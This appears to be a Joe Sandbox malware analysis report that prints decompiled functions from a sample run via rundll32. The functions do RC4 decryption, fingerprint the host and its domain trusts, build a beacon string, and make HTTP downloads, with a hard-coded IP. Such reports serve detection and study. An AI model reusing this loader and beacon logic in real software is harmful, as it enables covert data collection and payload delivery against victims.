                                            								_push(0x105 - _t52 - _t61 - 0x11d);
                                            								_push(_t61 - 0xd);
                                            								_push(_t52);
                                            								L00181200();
                                            								_t42 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
                                            								_t59 = _t42;
                                            							}
                                            						}
                                            					}
                                            					goto L14;
                                            				}
                                            			}

                                            APIs
                                            • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 00184B50
                                            • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 00184B5D
                                            • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 00184B63
                                            • lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 00184B8E
                                            • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00184BD5
                                            • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00184BE5
                                            • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00184C0D
                                            • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00184C1D
                                            • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 00184C43
                                            • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?), ref: 00184C53
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150641576.0000000000181000.00000020.00020000.sdmp, Offset: 00180000, based on PE: true
                                            • Associated: 00000003.00000002.3150636288.0000000000180000.00000002.00020000.sdmp
                                            • Associated: 00000003.00000002.3150651430.0000000000193000.00000004.00020000.sdmp
                                            • Associated: 00000003.00000002.3150656817.0000000000196000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_180000_rundll32.jbxd
                                            Similarity
                                            • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                            • String ID: .$Software\Borland\Delphi\Locales$Software\Borland\Locales
                                            • API String ID: 1599918012-3917250287
                                            • Opcode ID: 79f0665c4cacd4eabb9d4de724dc2afdaca6df8198d77ba4c398a64c40e9769f
                                            • Instruction ID: dadf2178be672ca213489227cc0536e48efbaf2f4a7fd3545d1850996c8f9f8f
                                            • Opcode Fuzzy Hash: 79f0665c4cacd4eabb9d4de724dc2afdaca6df8198d77ba4c398a64c40e9769f
                                            • Instruction Fuzzy Hash: 9B317572E0021D7BFB25EAB89C8AFDF7AAD5B14780F0441E1B604E6181EB749F448F90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 137 1c2cd0-1c2d10 CryptAcquireContextA 138 1c2d1c-1c2d35 CryptCreateHash 137->138 139 1c2d12 137->139 141 1c2d3b-1c2d51 CryptHashData 138->141 142 1c2d37 138->142 140 1c2da0-1c2da4 139->140 143 1c2da6-1c2db0 CryptDestroyHash 140->143 144 1c2db7-1c2dbb 140->144 145 1c2d57-1c2d74 CryptDeriveKey 141->145 146 1c2d53 141->146 142->140 143->144 149 1c2dbd-1c2dc7 CryptDestroyKey 144->149 150 1c2dce-1c2dd2 144->150 147 1c2d7a-1c2d94 CryptDecrypt 145->147 148 1c2d76 145->148 146->140 151 1c2d9a-1c2d9d 147->151 152 1c2d96 147->152 148->140 149->150 153 1c2dd4-1c2de0 CryptReleaseContext 150->153 154 1c2de7-1c2ded 150->154 151->140 152->140 153->154
                                            C-Code - Quality: 37%
                                            			E001C2CD0(BYTE* _a4, int _a8, intOrPtr _a12, intOrPtr _a16) {
                                            				int _v8;
                                            				long* _v12;
                                            				long* _v16;
                                            				int _v20;
                                            				intOrPtr _v24;
                                            				int _t32;
                                            				intOrPtr _t33;
                                            				long* _t35;
                                            
                                            				_v16 = 0;
                                            				_v8 = 0;
                                            				_v12 = 0;
                                            				_v20 = 0;
                                            				_v24 = 0x280011;
                                            				_t32 = CryptAcquireContextA( &_v12, 0, 0, 1, 0xf0000000); // executed
                                            				if(_t32 != 0) {
                                            					__imp__CryptCreateHash(_v12, 0x8004, 0, 0,  &_v8);
                                            					if(_t32 != 0) {
                                            						_t33 = _a16;
                                            						__imp__CryptHashData(_v8, _a12, _t33, 0);
                                            						if(_t33 != 0) {
                                            							_t35 = _v12;
                                            							__imp__CryptDeriveKey(_t35, 0x6801, _v8, _v24,  &_v16);
                                            							if(_t35 != 0) {
                                            								if(CryptDecrypt(_v16, 0, 1, 0, _a4,  &_a8) != 0) {
                                            									_v20 = _a8;
                                            								}
                                            							}
                                            						}
                                            					}
                                            				}
                                            				if(_v8 != 0) {
                                            					__imp__CryptDestroyHash(_v8);
                                            					_v8 = 0;
                                            				}
                                            				if(_v16 != 0) {
                                            					CryptDestroyKey(_v16);
                                            					_v16 = 0;
                                            				}
                                            				if(_v12 != 0) {
                                            					CryptReleaseContext(_v12, 0);
                                            					_v12 = 0;
                                            				}
                                            				return _v20;
                                            			}











                                            APIs
                                            • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000), ref: 001C2D08
                                            • CryptCreateHash.ADVAPI32(00000000,00008004,00000000,00000000,00000000), ref: 001C2D2D
                                            • CryptDestroyHash.ADVAPI32(00000000), ref: 001C2DAA
                                            • CryptDestroyKey.ADVAPI32(00000000), ref: 001C2DC1
                                            • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 001C2DDA
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150671775.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1c0000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Crypt$ContextDestroyHash$AcquireCreateRelease
                                            • String ID:
                                            • API String ID: 1222261195-0
                                            • Opcode ID: d39b6a890fa48ea3ba55614102ce4731bc5bde88955e7894e8edb724428166d2
                                            • Instruction ID: 7df5eeff44b916eeeb46a04316285c3be730a6986454161226ec0f2ff56a5869
                                            • Opcode Fuzzy Hash: d39b6a890fa48ea3ba55614102ce4731bc5bde88955e7894e8edb724428166d2
                                            • Instruction Fuzzy Hash: 3931FC75A44208FBEB14CFE4DC59FEE7B78AB64705F208548F602A7280D7B4DA44DB54
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 155 1c3400-1c3428 call 1c14a0 GetModuleHandleA 158 1c342e-1c3444 GetProcAddress 155->158 159 1c342a-1c342c 155->159 161 1c344f-1c3453 GetSystemInfo 158->161 162 1c3446-1c344d GetNativeSystemInfo 158->162 160 1c346b-1c346e 159->160 163 1c3459-1c3460 161->163 162->163 164 1c3469 163->164 165 1c3462-1c3467 163->165 164->160 165->160
                                            C-Code - Quality: 75%
                                            			E001C3400() {
                                            				struct HINSTANCE__* _v8;
                                            				_Unknown_base(*)()* _v12;
                                            				struct _SYSTEM_INFO _v48;
                                            
                                            				E001C14A0( &_v48, 0, 0x24);
                                            				_v8 = GetModuleHandleA("kernel32.dll");
                                            				if(_v8 != 0) {
                                            					_v12 = GetProcAddress(_v8, "GetNativeSystemInfo");
                                            					if(_v12 == 0) {
                                            						GetSystemInfo( &_v48);
                                            					} else {
                                            						_v12( &_v48);
                                            					}
                                            					if((_v48.dwOemId & 0x0000ffff) != 9) {
                                            						return 0;
                                            					} else {
                                            						return 1;
                                            					}
                                            				}
                                            				return 0;
                                            			}






                                            APIs
                                            • GetModuleHandleA.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,?,?,?,?,?,001C1B21), ref: 001C341B
                                            • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 001C3437
                                            • GetNativeSystemInfo.KERNEL32(?), ref: 001C344A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150671775.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1c0000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AddressHandleInfoModuleNativeProcSystem
                                            • String ID: GetNativeSystemInfo$kernel32.dll
                                            • API String ID: 3469989633-192647395
                                            • Opcode ID: 8c8568c6222c0346ca32f51a4a9955b7cd941f777de10fe2bf5e9292aafa88e4
                                            • Instruction ID: 0c0fdac1da722e55d94acef6737ea833eceea2f9689e848f1bc0e6c188afb326
                                            • Opcode Fuzzy Hash: 8c8568c6222c0346ca32f51a4a9955b7cd941f777de10fe2bf5e9292aafa88e4
                                            • Instruction Fuzzy Hash: A4018131D44208EBCB08DBF49859FED7B78AB28711F10C559EA11A3180E774C684DB61
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 190 1c1aa0-1c1b28 call 1c1420 GetVersion call 1c2630 call 1c30f0 call 1c2520 call 1c23c0 call 1c3400 203 1c1b69-1c1ba3 call 1c25b0 wsprintfA 190->203 204 1c1b2a-1c1b44 call 1c25b0 190->204 209 1c1ba6-1c1bad 203->209 207 1c1b49-1c1b67 wsprintfA 204->207 207->209 210 1c1baf-1c1bce call 1c1390 209->210 211 1c1bd2 209->211 210->211 213 1c1bd9-1c1bdd 211->213 215 1c1c68 213->215 216 1c1be3-1c1bf6 213->216 217 1c1c6a-1c1c6d 215->217 218 1c1bf8-1c1c07 call 1c2660 216->218 219 1c1c0a-1c1c24 call 1c28d0 216->219 218->219 223 1c1c29-1c1c33 219->223 224 1c1c44-1c1c48 223->224 225 1c1c35-1c1c41 call 1c1a00 223->225 226 1c1c4a-1c1c4f 224->226 227 1c1c51-1c1c63 224->227 225->224 226->217 227->213
                                            C-Code - Quality: 95%
                                            			E001C1AA0(intOrPtr __edx, void* __eflags, void* _a4, intOrPtr _a8, DWORD* _a12) {
                                            				intOrPtr _v8;
                                            				signed int _v12;
                                            				signed int _v16;
                                            				signed int _v20;
                                            				intOrPtr _v24;
                                            				intOrPtr _v28;
                                            				intOrPtr _v32;
                                            				intOrPtr _v36;
                                            				char _v68;
                                            				char _v324;
                                            				char _v2372;
                                            				char _v6468;
                                            				intOrPtr _t47;
                                            				intOrPtr _t56;
                                            				char* _t63;
                                            				intOrPtr _t66;
                                            				intOrPtr _t69;
                                            				intOrPtr _t70;
                                            				intOrPtr _t71;
                                            				char* _t72;
                                            				void* _t75;
                                            				char* _t89;
                                            				intOrPtr _t95;
                                            				char* _t104;
                                            				intOrPtr _t106;
                                            				void* _t110;
                                            				void* _t113;
                                            				void* _t114;
                                            
                                            				_t95 = __edx;
                                            				E001C1420(0x1940);
                                            				_v12 = GetVersion();
                                            				_t47 = E001C2630(_t95); // executed
                                            				_v32 = _t47;
                                            				_v28 = _t95;
                                            				E001C30F0( &_v324); // executed
                                            				E001C2520( &_v68,  &_v68); // executed
                                            				E001C23C0( &_v2372); // executed
                                            				_t113 = _t110 + 0xc;
                                            				_v20 = _v12 & 0xff;
                                            				_v16 = (_v12 & 0xffff) >> 0x00000008 & 0xff;
                                            				_t56 = E001C3400(); // executed
                                            				_v36 = _t56;
                                            				if(_v36 != 1) {
                                            					_push(_v16);
                                            					wsprintfA( &_v6468, "GUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x32)", _v32, _v28, E001C25B0( &_v68),  &_v324,  &_v2372,  &_v68, _v20);
                                            					_t114 = _t113 + 0x28;
                                            				} else {
                                            					_push(_v16);
                                            					_t75 = E001C25B0( &_v324); // executed
                                            					wsprintfA( &_v6468, "GUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x64)", _v32, _v28, _t75,  &_v324,  &_v2372,  &_v68, _v20);
                                            					_t114 = _t113 + 0x28;
                                            				}
                                            				if( *0x1c72a0 == 0) {
                                            					_t71 = E001C1390(0x400);
                                            					_t114 = _t114 + 4;
                                            					 *0x1c72a0 = _t71;
                                            					_t72 =  *0x1c72a0; // 0x42a408
                                            					 *_t72 = 0;
                                            				}
                                            				_v24 = 1;
                                            				while(_v24 == 1) {
                                            					_t63 =  *0x1c72a0; // 0x42a408
                                            					_t87 =  *_t63;
                                            					if( *_t63 == 0) {
                                            						_t106 =  *0x1c72a0; // 0x42a408
                                            						_t70 = E001C2660(_t87, _t106);
                                            						_t114 = _t114 + 4;
                                            						_v24 = _t70;
                                            					}
                                            					_t89 =  *0x1c72a0; // 0x42a408
                                            					_t66 = E001C28D0(_t89,  &_v6468, _a4, _a8, _a12); // executed
                                            					_t114 = _t114 + 0x14;
                                            					_v8 = _t66;
                                            					if(_v8 == 1) {
                                            						_t69 = E001C1A00(_t89, _a4);
                                            						_t114 = _t114 + 4;
                                            						_v8 = _t69;
                                            					}
                                            					if(_v8 != 1) {
                                            						_t104 =  *0x1c72a0; // 0x42a408
                                            						 *_t104 = 0;
                                            						continue;
                                            					} else {
                                            						return 1;
                                            					}
                                            				}
                                            				return 0;
                                            			}































                                            APIs
                                            • GetVersion.KERNEL32(?,001C18CD,?,00100000,?), ref: 001C1AAD
                                              • Part of subcall function 001C30F0: GetComputerNameA.KERNEL32(?,00000104), ref: 001C311A
                                              • Part of subcall function 001C30F0: lstrcatA.KERNEL32(00100000,?), ref: 001C312F
                                              • Part of subcall function 001C30F0: lstrcatA.KERNEL32(00100000, @ ), ref: 001C313E
                                              • Part of subcall function 001C30F0: lstrcatA.KERNEL32(00100000,?), ref: 001C3162
                                              • Part of subcall function 001C2520: lstrcpyA.KERNEL32(001C1AD9,84.17.52.3,?,?,001C1AD9,?,?), ref: 001C2540
                                              • Part of subcall function 001C23C0: DsEnumerateDomainTrustsA.NETAPI32(00000000,0000003F,001C1AE8,?,?,001C1AE8,?,?,?), ref: 001C23E1
                                              • Part of subcall function 001C3400: GetModuleHandleA.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,?,?,?,?,?,001C1B21), ref: 001C341B
                                            • wsprintfA.USER32 ref: 001C1B5E
                                            • wsprintfA.USER32 ref: 001C1B9D
                                            Strings
                                            • GUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x64), xrefs: 001C1B52
                                            • GUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x32), xrefs: 001C1B91
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150671775.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1c0000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$wsprintf$ComputerDomainEnumerateHandleModuleNameTrustsVersionlstrcpy
                                            • String ID: GUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x32)$GUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x64)
                                            • API String ID: 768865819-2171647522
                                            • Opcode ID: 6f624fb805d8e6f883b6a84d8e33ebd04e795ed0a46ce36b1c4d4704b8b0ab55
                                            • Instruction ID: 81125cdf395b765cea67bfd699ab8ca82fb29ce171a984c8caa456400eeca14a
                                            • Opcode Fuzzy Hash: 6f624fb805d8e6f883b6a84d8e33ebd04e795ed0a46ce36b1c4d4704b8b0ab55
                                            • Instruction Fuzzy Hash: 57514CB2D04219ABDB18DB94DC52FFEB7B8BB69300F04816DF60697241E734DA85CB61
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            C-Code - Quality: 82%
                                            			E001917A0(void* __eax, struct HINSTANCE__* __edx, CHAR* _a4) {
                                            				CHAR* _v8;
                                            				void* __ebx;
                                            				void* __ecx;
                                            				void* __edi;
                                            				void* __esi;
                                            				void* __ebp;
                                            				struct HRSRC__* _t12;
                                            				void* _t18;
                                            				void* _t23;
                                            				CHAR* _t24;
                                            				void* _t25;
                                            				struct HRSRC__* _t29;
                                            				void* _t30;
                                            				struct HINSTANCE__* _t31;
                                            				void* _t32;
                                            
                                            				_v8 = _t24;
                                            				_t31 = __edx;
                                            				_t23 = __eax;
                                            				_t12 = FindResourceA(__edx, _v8, _a4); // executed
                                            				_t29 = _t12;
                                            				 *(_t23 + 0x10) = _t29;
                                            				_t33 = _t29;
                                            				if(_t29 == 0) {
                                            					E00191730(_t23, _t24, _t29, _t31, _t33, _t32);
                                            					_pop(_t24);
                                            				}
                                            				_t5 = _t23 + 0x10; // 0x191844
                                            				_t30 = LoadResource(_t31,  *_t5);
                                            				 *(_t23 + 0x14) = _t30;
                                            				_t34 = _t30;
                                            				if(_t30 == 0) {
                                            					E00191730(_t23, _t24, _t30, _t31, _t34, _t32);
                                            				}
                                            				_t7 = _t23 + 0x10; // 0x191844
                                            				_push(SizeofResource(_t31,  *_t7));
                                            				_t8 = _t23 + 0x14; // 0x1916b4
                                            				_t18 = LockResource( *_t8);
                                            				_pop(_t25);
                                            				return E00191674(_t23, _t25, _t18);
                                            			}


















                                            APIs
                                            • FindResourceA.KERNEL32 ref: 001917B7
                                            • LoadResource.KERNEL32(00180000,00191844,00180000,?,00194890,0018F4D0,00180000,00000001,00000000,?,00191710,00194890), ref: 001917D1
                                            • SizeofResource.KERNEL32(00180000,00191844,00180000,00191844,00180000,?,00194890,0018F4D0,00180000,00000001,00000000,?,00191710,00194890), ref: 001917EB
                                            • LockResource.KERNEL32(001916B4,00000000,00180000,00191844,00180000,00191844,00180000,?,00194890,0018F4D0,00180000,00000001,00000000,?,00191710,00194890), ref: 001917F5
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150641576.0000000000181000.00000020.00020000.sdmp, Offset: 00180000, based on PE: true
                                            • Associated: 00000003.00000002.3150636288.0000000000180000.00000002.00020000.sdmp
                                            • Associated: 00000003.00000002.3150651430.0000000000193000.00000004.00020000.sdmp
                                            • Associated: 00000003.00000002.3150656817.0000000000196000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_180000_rundll32.jbxd
                                            Similarity
                                            • API ID: Resource$FindLoadLockSizeof
                                            • String ID:
                                            • API String ID: 3473537107-0
                                            • Opcode ID: 51c1e61dcfffe8b7754b5a164afb9972288f8e23f8027a0d3c98afbb94ee287f
                                            • Instruction ID: 6ab115d26331fd6b9d2b012cab050ffda43a682322ef5eb5de3406071425d843
                                            • Opcode Fuzzy Hash: 51c1e61dcfffe8b7754b5a164afb9972288f8e23f8027a0d3c98afbb94ee287f
                                            • Instruction Fuzzy Hash: 1CF06DB36056057F9B08EE9CA881D5B77DDDFA82A03600019F908CB202DB30DE4147B8
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E001C1390(long _a4) {
                                            				void* _t4;
                                            				void* _t6;
                                            
                                            				if( *0x1c715c == 0) {
                                            					 *0x1c715c = GetProcessHeap();
                                            				}
                                            				if( *0x1c715c == 0) {
                                            					return 0;
                                            				} else {
                                            					_t6 =  *0x1c715c; // 0x390000
                                            					_t4 = RtlAllocateHeap(_t6, 0, _a4); // executed
                                            					return _t4;
                                            				}
                                            			}






                                            APIs
                                            • GetProcessHeap.KERNEL32(?,001C1886,00100000), ref: 001C139C
                                            • RtlAllocateHeap.NTDLL(00390000,00000000,001C1886,?,001C1886,00100000), ref: 001C13BD
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150671775.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1c0000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocateProcess
                                            • String ID:
                                            • API String ID: 1357844191-0
                                            • Opcode ID: 2bc351c381780131fc0edc8c2aff303822400431a21b18cd6ed43c56ef2fa349
                                            • Instruction ID: 4eaff079a9e7e93f886a7491d368d1b582847bb3b23a58d74ce1c9f1269f8931
                                            • Opcode Fuzzy Hash: 2bc351c381780131fc0edc8c2aff303822400431a21b18cd6ed43c56ef2fa349
                                            • Instruction Fuzzy Hash: D4E0EC3158C285EFD3489FA1EC1CF653FA8B316315F08641AE60586EA1C7B5D8D0CF50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 88 1c1fe0-1c2054 call 1c14a0 InternetCrackUrlA 91 1c205d-1c2061 88->91 92 1c2056-1c2058 88->92 94 1c206a-1c206e 91->94 95 1c2063 91->95 93 1c222a-1c222d 92->93 96 1c207d-1c2089 call 1c24f0 94->96 97 1c2070-1c2074 94->97 95->94 101 1c208b-1c208d 96->101 102 1c2092-1c20a5 96->102 97->96 98 1c2076-1c2078 97->98 98->93 101->93 103 1c20a7-1c20b0 102->103 104 1c20b3-1c20da InternetConnectA 102->104 103->104 105 1c20dc-1c20de 104->105 106 1c20e3-1c210f HttpOpenRequestA 104->106 105->93 107 1c2111-1c211d InternetCloseHandle 106->107 108 1c2122-1c2126 106->108 107->93 109 1c2128-1c215a InternetQueryOptionA InternetSetOptionA 108->109 110 1c2160-1c21a0 HttpSendRequestA HttpQueryInfoA 108->110 109->110 111 1c2204-1c221f InternetCloseHandle * 2 110->111 112 1c21a2-1c21a6 110->112 113 1c2228 111->113 114 1c2221-1c2226 111->114 112->111 115 1c21a8-1c21ab 112->115 113->93 114->93 116 1c21b1-1c21b8 115->116 116->111 117 1c21ba-1c21d7 InternetReadFile 116->117 118 1c21d9-1c21dd 117->118 119 1c2200 117->119 118->119 120 1c21df-1c2202 118->120 119->111 120->116
                                            C-Code - Quality: 89%
                                            			E001C1FE0(char* _a4, void* _a8, long _a12, DWORD** _a16) {
                                            				void* _v8;
                                            				long _v12;
                                            				void* _v16;
                                            				signed short _v20;
                                            				signed int _v24;
                                            				void _v28;
                                            				void _v32;
                                            				void* _v36;
                                            				long _v40;
                                            				long _v44;
                                            				int _v48;
                                            				intOrPtr _v60;
                                            				char* _v64;
                                            				signed short _v84;
                                            				intOrPtr _v88;
                                            				char* _v92;
                                            				long _v96;
                                            				void* _v108;
                                            				char _v368;
                                            				char _v628;
                                            				int _t79;
                                            				void* _t80;
                                            				void* _t83;
                                            				void* _t141;
                                            
                                            				E001C14A0( &_v108, 0, 0x3c);
                                            				_v108 = 0x3c;
                                            				_v92 =  &_v368;
                                            				_v88 = 0x104;
                                            				_v64 =  &_v628;
                                            				_v60 = 0x104;
                                            				 *((char*)(_t141 + 0xfffffffffffffe94)) = 0;
                                            				 *((char*)(_t141 + 0xfffffffffffffd90)) = 0;
                                            				_t79 = InternetCrackUrlA(_a4, 0, 0,  &_v108); // executed
                                            				if(_t79 != 0) {
                                            					if(_v96 == 0) {
                                            						_v96 = 3;
                                            					}
                                            					if(_v96 == 3 || _v96 == 4) {
                                            						_t80 = E001C24F0(); // executed
                                            						_v36 = _t80;
                                            						if(_v36 != 0) {
                                            							_v20 = _v84;
                                            							_v24 = 0x84080100;
                                            							if(_v96 == 4) {
                                            								_v24 = _v24 | 0x00803000;
                                            							}
                                            							_t83 = InternetConnectA(_v36,  &_v368, _v20 & 0x0000ffff, 0, 0, 3, 0, 1); // executed
                                            							_v16 = _t83;
                                            							if(_v16 != 0) {
                                            								_v8 = HttpOpenRequestA(_v16, "GET",  &_v628, 0, 0, 0x1c7050, _v24, 1);
                                            								if(_v8 != 0) {
                                            									if(_v96 == 4) {
                                            										_v40 = 4;
                                            										InternetQueryOptionA(_v8, 0x1f,  &_v28,  &_v40);
                                            										_v28 = _v28 | 0x00001100;
                                            										InternetSetOptionA(_v8, 0x1f,  &_v28, 4);
                                            									}
                                            									HttpSendRequestA(_v8, 0, 0, 0, 0); // executed
                                            									_v32 = 0;
                                            									_v44 = 4;
                                            									HttpQueryInfoA(_v8, 0x20000013,  &_v32,  &_v44, 0);
                                            									if(_v32 != 0xc8 || _a8 == 0) {
                                            										L26:
                                            										InternetCloseHandle(_v8); // executed
                                            										InternetCloseHandle(_v16);
                                            										if(_v32 != 0xc8) {
                                            											return 0;
                                            										}
                                            										return 1;
                                            									} else {
                                            										 *_a16 = 0;
                                            										while(1 != 0) {
                                            											_v48 = InternetReadFile(_v8, _a8, _a12,  &_v12);
                                            											if(_v48 != 1 || _v12 <= 0) {
                                            												goto L26;
                                            											} else {
                                            												_a8 = _a8 + _v12;
                                            												_a12 = _a12 - _v12;
                                            												 *_a16 =  *_a16 + _v12;
                                            												continue;
                                            											}
                                            										}
                                            										goto L26;
                                            									}
                                            								}
                                            								InternetCloseHandle(_v16);
                                            								return 0;
                                            							} else {
                                            								return 0;
                                            							}
                                            						}
                                            						return 0;
                                            					} else {
                                            						return 0;
                                            					}
                                            				}
                                            				return 0;
                                            			}




























                                            APIs
                                            • InternetCrackUrlA.WININET(001C1AD9,00000000,00000000,0000003C), ref: 001C204C
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150671775.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1c0000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CrackInternet
                                            • String ID: <$GET
                                            • API String ID: 1381609488-427699995
                                            • Opcode ID: c627c61d03f191db30c1cbb062d703997058cc51b937a0243c68d637985fb5a9
                                            • Instruction ID: 74febb9b1f81d1ad0910ea92d81116d4bbd18d376c3b99c0df1f0ee86ea89bb5
                                            • Opcode Fuzzy Hash: c627c61d03f191db30c1cbb062d703997058cc51b937a0243c68d637985fb5a9
                                            • Instruction Fuzzy Hash: F271FA74E04209EFEB14CFA4D859FEEBBB5EB58700F108469E611AB280D7B59A84CF51
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 166 1c3000-1c301e OpenProcess 167 1c3027-1c303c OpenProcessToken 166->167 168 1c3020-1c3022 166->168 170 1c303e-1c3040 167->170 171 1c3045-1c3062 GetTokenInformation 167->171 169 1c30e7-1c30ea 168->169 170->169 172 1c306f-1c3071 171->172 173 1c3064-1c306d GetLastError 171->173 172->169 173->172 174 1c3073-1c30a9 call 1c1390 GetTokenInformation 173->174 177 1c30d8-1c30e4 call 1c13d0 174->177 178 1c30ab-1c30cf LookupAccountSidA 174->178 177->169 178->177 179 1c30d1 178->179 179->177
                                            C-Code - Quality: 100%
                                            			E001C3000(long _a4, CHAR* _a8, long _a12, CHAR* _a16, long _a20) {
                                            				long _v8;
                                            				void* _v12;
                                            				void* _v16;
                                            				void* _v20;
                                            				void* _v24;
                                            				union _TOKEN_INFORMATION_CLASS _v28;
                                            				union _SID_NAME_USE _v32;
                                            				int _t31;
                                            				int _t37;
                                            				int _t43;
                                            
                                            				_v12 = OpenProcess(0x400, 0, _a4);
                                            				if(_v12 != 0) {
                                            					if(OpenProcessToken(_v12, 0x20008,  &_v16) != 0) {
                                            						_v8 = 0;
                                            						_t31 = GetTokenInformation(_v16, 1, 0, 0,  &_v8); // executed
                                            						if(_t31 != 0 || GetLastError() != 0x7a) {
                                            							return 0;
                                            						} else {
                                            							_v24 = E001C1390(_v8);
                                            							_v20 = _v24;
                                            							_v28 = 0;
                                            							_t37 = GetTokenInformation(_v16, 1, _v20, _v8,  &_v8); // executed
                                            							if(_t37 != 0) {
                                            								_t43 = LookupAccountSidA(0,  *_v20, _a8,  &_a12, _a16,  &_a20,  &_v32); // executed
                                            								if(_t43 != 0) {
                                            									_v28 = 1;
                                            								}
                                            							}
                                            							E001C13D0(_v24);
                                            							return _v28;
                                            						}
                                            					}
                                            					return 0;
                                            				}
                                            				return 0;
                                            			}














                                            APIs
                                            • OpenProcess.KERNEL32(00000400,00000000,?,?,001C2E45,?,?,00000104,?,00000104), ref: 001C3011
                                            • OpenProcessToken.ADVAPI32(00000000,00020008,00000104,?,001C2E45,?,?,00000104), ref: 001C3034
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150671775.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1c0000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: OpenProcess$Token
                                            • String ID:
                                            • API String ID: 2935449343-0
                                            • Opcode ID: 1d48ae6ee3bab75246e6f8ca7dd1c57a6d9a8e5ecf60a8664c62539c4fb4e313
                                            • Instruction ID: 90c49833be052634c9d2c456227d4b168a05594501a285dd9a5d63e462408ebe
                                            • Opcode Fuzzy Hash: 1d48ae6ee3bab75246e6f8ca7dd1c57a6d9a8e5ecf60a8664c62539c4fb4e313
